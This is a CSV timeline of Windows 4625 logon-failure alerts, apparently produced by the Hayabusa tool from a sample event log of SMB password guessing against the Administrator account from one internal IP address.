2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ui5RoLKttDo0wfFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G2xjdWobsxBjo6p7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TPeQ0M5lXITI84G3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uu72qx4lG5ZRM7xf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zD072YR1hIgbzjaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqA7HDvImIlCiFq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: efYFxZwMGEC3vVi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6WmMHYegvFJvv6zd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DS9WkRnP0B5MgaeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5jNPV7ZgFExgg9n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1FJ6vm3wK97iual | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLuIx0sfF8NQD8QY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y3lMvcrrmGTkjdlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZqOabcNMeazs6TC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2AbE9D8PvuFDBz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzWdLEEc68ZvviGh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtV3BuZiljbAeikO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnKKfcwikNDdYOam | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jSbbzD7fpJY4Q1JL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gOASpLLE25ruCnGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jhUGOtszbPUwccL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yB8Mzo1RppdpLFKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOwoUlHGVeSbAhuN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BXIEHbkrjwedeaih | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OvsKoixgEzUgAyie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TzaZe6Y4Tdfjseuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEmbuU3CAC3CecZy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kfBmqmVPd0CGVUsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Uz3TlU6yrcveM1w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z6hH6AkkgBFmeZ6u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2J1W2WhA6Pj7j5j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: soHOxnkoOn7ot0My | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4c2oWI6mRIvSVSKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKsXD8aTyaC4fBqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrzji5ucmutsZNpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BApOU105FCLwj4zn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EO50f7NfrrdwwCNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PfTYbWC8IjW87th8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wLnE6zm5US4maK04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AV7taC7hYQdVjAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8MnnaSRs0bnYVlMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YgqavZ1SuNvX7RgH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IQvoIsfW0LhDit2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 33IPGQXc1MarY30J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: II4Ly9LnkWlq60Ux | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wncfJC7kDSI7O9Ud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6XzbWef3PuzQK3FJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M5670HdNC6c8O56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ea8FcddgLyV5o6oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjyhmKFdBNrHIvTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIF47pEWBMp6Nbym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6TO891WvJPkdjsct | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6cLnJYpHEzGAvhWG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gy6cFTrwrpRQFxfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gxz612Z88PMCKzAk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GSPC8hibdZdyOcex | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6vlmykLeFmuhn81B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w4lEW9w53zMFPcc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jt2lDRFWwi6adwlB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G9MGvle35u5OGB5o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.065 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJgLFM2vrnKuj5N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8HRyDAzwKj9bfnA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J65LcwnRgEob9wjY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhas9e1fwDZ1Fxvt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5qJRSpjS6tZJjNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bo4HAgP2tw0GmZ4o | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zv0cbLCD7E05i0g5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FIKsQLk5iPyKoeqM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RiHAaBszJBGe2deQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8em4eOiqze683Cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86lXQsnn7dae93tW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.524 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Iu8olNGPmhxh6iNu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZYtN5EMHxcNqID6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mtUQGxrMoPkpUQCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYh4e3bpePhDoRwr | IP Addr: 192.168.198.149 | AuthPackage: 